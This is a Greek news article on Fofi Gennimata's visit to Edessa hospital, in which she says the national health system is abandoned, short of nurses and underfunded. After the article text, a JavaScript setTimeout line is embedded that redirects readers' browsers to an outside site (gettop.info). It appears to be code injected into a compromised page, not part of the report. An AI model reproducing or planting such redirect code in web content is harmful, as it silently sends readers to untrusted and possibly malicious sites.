Γεννηματά: Το ΕΣΥ έχει εγκαταλειφθεί στην τύχη του

0
8
ΑΠΕ-ΜΠΕ/ΠΑΝΤΕΛΗΣ ΣΑΪΤΑΣ

 

Το Εθνικό Σύστημα Υγείας έχει εγκαταλειφθεί τελείως στην τύχη του και σήμερα στα νοσοκομεία κρίνεται και η επιβίωση των ανθρώπων, αλλά, ταυτόχρονα, δοκιμάζεται η ανθρώπινη αξιοπρέπεια, δήλωσε η Φώφη Γεννηματά, κατά την επίσκεψη της στο νοσοκομείο της Εδεσσας.

Κατηγόρησε την κυβέρνηση ότι δεν κατάφερε να προχωρήσει τις προσλήψεις, που ήταν εγκεκριμένες από το 2014, και τόνισε την ανάγκη να διεκδικήσει η Ελλάδα προσλήψεις για το ΕΣΥ που θα εξαιρούνται από τους μνημονιακούς περιορισμούς, όπως και να δοθεί προτεραιότητα σε ένα δίκτυο Πρωτοβάθμιας Φροντίδας Υγείας, στηριγμένο σε όλες τις υπάρχουσες δομές.

«Το Εθνικό Σύστημα Υγείας αποτελεί μια πολύ μεγάλη κατάκτηση για τον ελληνικό λαό, παρά τα προβλήματα που αντιμετώπισε τα προηγούμενα χρόνια. Δυστυχώς, όμως, σήμερα έχει εγκαταλειφθεί τελείως στην τύχη του. Σήμερα στα νοσοκομεία κρίνεται και η επιβίωση των ανθρώπων, αλλά ταυτόχρονα δοκιμάζεται η ανθρώπινη αξιοπρέπεια«, επισήμανε η κ. Γεννηματά και πρόσθεσε:

«Ελάχιστη χρηματοδότηση, υποστελέχωση, 7.000 λιγότεροι νοσηλευτές μόνο μέσα στο 2015. Είχαμε ένα θλιβερό ρεκόρ θανάτων με την έξαρση της γρίπης ακριβώς, γιατί έμειναν κλειστές Μονάδες Εντατικής Θεραπείας λόγω έλλειψης νοσηλευτών.

Η κυβέρνηση δεν κατάφερε να προχωρήσει τις προσλήψεις που ήταν εγκεκριμένες από το 2014 και το μόνο που κάνει είναι να εξαγγέλλει κάθε μήνα σχεδόν 4.000 προσλήψεις.

Είναι ακριβώς ο ίδιος αριθμός. Είναι φανερό ότι έτσι δεν προχωράμε άλλο, θα πρέπει να ληφθούν άμεσα μέτρα, διότι την ίδια στιγμή η συμμετοχή των πολιτών στις δαπάνες υγείας έχει αυξηθεί.

Θα πρέπει, λοιπόν, να προχωρήσουμε στη διεκδίκηση προσλήψεων για το Εθνικό Σύστημα Υγείας που θα εξαιρούνται από τους μνημονιακούς περιορισμούς και θα πρέπει να δώσουμε προτεραιότητα σε ένα δίκτυο Πρωτοβάθμιας Φροντίδας Υγείας, στηριγμένο σε όλες τις δομές που υπάρχουν αυτή τη στιγμή στο σύστημα, έτσι ώστε να περιορίσουμε τις δαπάνες, χωρίς να μειώσουμε τις υπηρεσίες και το Κοινωνικό Κράτος«.

. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here